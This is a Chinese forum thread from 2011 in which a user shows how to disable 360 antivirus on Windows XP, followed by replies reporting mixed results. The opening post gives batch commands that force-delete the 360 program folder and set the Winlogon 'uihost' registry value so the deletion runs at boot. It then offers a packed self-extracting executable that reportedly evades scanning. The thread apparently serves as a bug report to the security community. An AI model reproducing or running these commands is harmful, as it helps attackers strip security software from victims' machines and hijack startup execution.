查看: 18752|回复: 100
收起左侧

[讨论] ★★★利用批处理,绕过360杀毒这个问题不是大问题,病毒能做到开机立即运行不必这麻烦

  [复制链接]
李白vs苏轼
发表于 2011-4-7 21:34:17 | 显示全部楼层 |阅读模式
本帖最后由 李白vs苏轼 于 2011-4-10 11:45 编辑

测试环境xp sp3,杀毒版本2.0.0.1330(注意没装卫士,卫士会拦截),刚试了下1331j一样挂了。。
网络处于联网状态
这个方法是我研究注册表无聊过金山,微点(楼下反应过瑞星了,具体懒得试)成功后,试试360本来以为肯定失败,结果卫士拦截,杀毒没拦截,想不通,,,....

这个问题老是有几率的重现,想不明白,初步分析可能与初始化时网络情况有关
原理:利用xp的uihost(只在xp下有用)在c盘下建一个bat文件1.bat

  1. rmdir /s/q "C:\Program Files\360"
复制代码
再建一个bat文件2.bat(名字随便吧)位置随便
  1. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v uihost /t reg_sz /d "c:\1.bat" /f
  2. shutdown -r -t 0
复制代码
运行2.bat,等重启后360文件夹下就剩几个文件而已了,杀毒删除了

根据这个,我把这两个批处理压成自解压,并自运行,扫描没报毒,
有新版的也试试,毕竟这个正式版有点老了
怕云起作用所以录了视频,地址为:
http://u.115.com/file/f67e30746a

我把exe文件也传上来,你们试试:
(云应该响应了,一开始报安全,看录像便知道了)


密码:19

第一次安装得重启,因为第一次安装后自保重启前是没开的











本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 5经验 +50 人气 +5 收起 理由
aqingge + 1
leisong + 1 很好很精彩
sli + 2 支持反馈BUG
你想怎样 + 1 不能太安逸
七宝 + 50 响鼓须重锤,要不360总100%太安逸了..

查看全部评分

亡灵之月
发表于 2011-4-7 21:40:50 | 显示全部楼层
本帖最后由 亡灵之月 于 2011-4-7 22:20 编辑

rp不好,没拦截,但是也没成功
vbox 一直联网+ ylmf 6.0 +刚下载的360杀毒正式版

安装好后,打开设置,发现自保已经开启,记得以前要求重启的

重启,双击2.bat ,重启

弹cmd窗口,刷拒绝访问,刷了好几遍,终于到了用户名登录的界面,进去后,360杀毒一切正常
Tron
头像被屏蔽
发表于 2011-4-7 21:50:22 | 显示全部楼层
本帖最后由 Tron 于 2011-4-7 21:53 编辑

这个问题好像早就说过了?主防会拦截的,注意开杀毒主防
李白vs苏轼
 楼主| 发表于 2011-4-7 21:51:34 | 显示全部楼层
本帖最后由 李白vs苏轼 于 2011-4-7 22:13 编辑

回复 3楼 Tron 的帖子

有开拦截的而且不是手动运行的,我让自解压去运行,,,,,,而且,卫士直接拦截reg行为
可是杀毒同样调用卫士的 为什么不拦 我想不通,郁闷
Tron
头像被屏蔽
发表于 2011-4-7 21:53:49 | 显示全部楼层
李白vs苏轼 发表于 2011-4-7 21:51
回复 3楼 Tron 的帖子

不是手动运行的,我让自解压去运行,,,,,,而且,卫士直接拦截reg行为

我记错了,看3楼重新编辑了
小蚂蚁的梦想
发表于 2011-4-7 21:54:23 | 显示全部楼层
杀毒的主防难道不拦截么
李白vs苏轼
 楼主| 发表于 2011-4-7 21:55:45 | 显示全部楼层
本帖最后由 李白vs苏轼 于 2011-4-7 21:58 编辑

回复 3楼 Tron 的帖子

有的 待会看录像,115总是上传失败,谁借我个网盘
nazisoft
发表于 2011-4-7 21:57:17 | 显示全部楼层
卫士的主防才是重点,360杀毒是用来扫描的
z13667152750
发表于 2011-4-7 21:58:43 | 显示全部楼层
刚把虚拟机全删除了,固定硬盘设得太小,装个.net2.0,磁盘空间不足
搞了半天,另建磁盘,换虚拟内存位置还是空间不足
受不了,刚在重装虚拟机
李白vs苏轼
 楼主| 发表于 2011-4-7 22:04:46 | 显示全部楼层
回复 3楼 Tron 的帖子

录像好了
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-25 17:44 , Processed in 0.155423 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表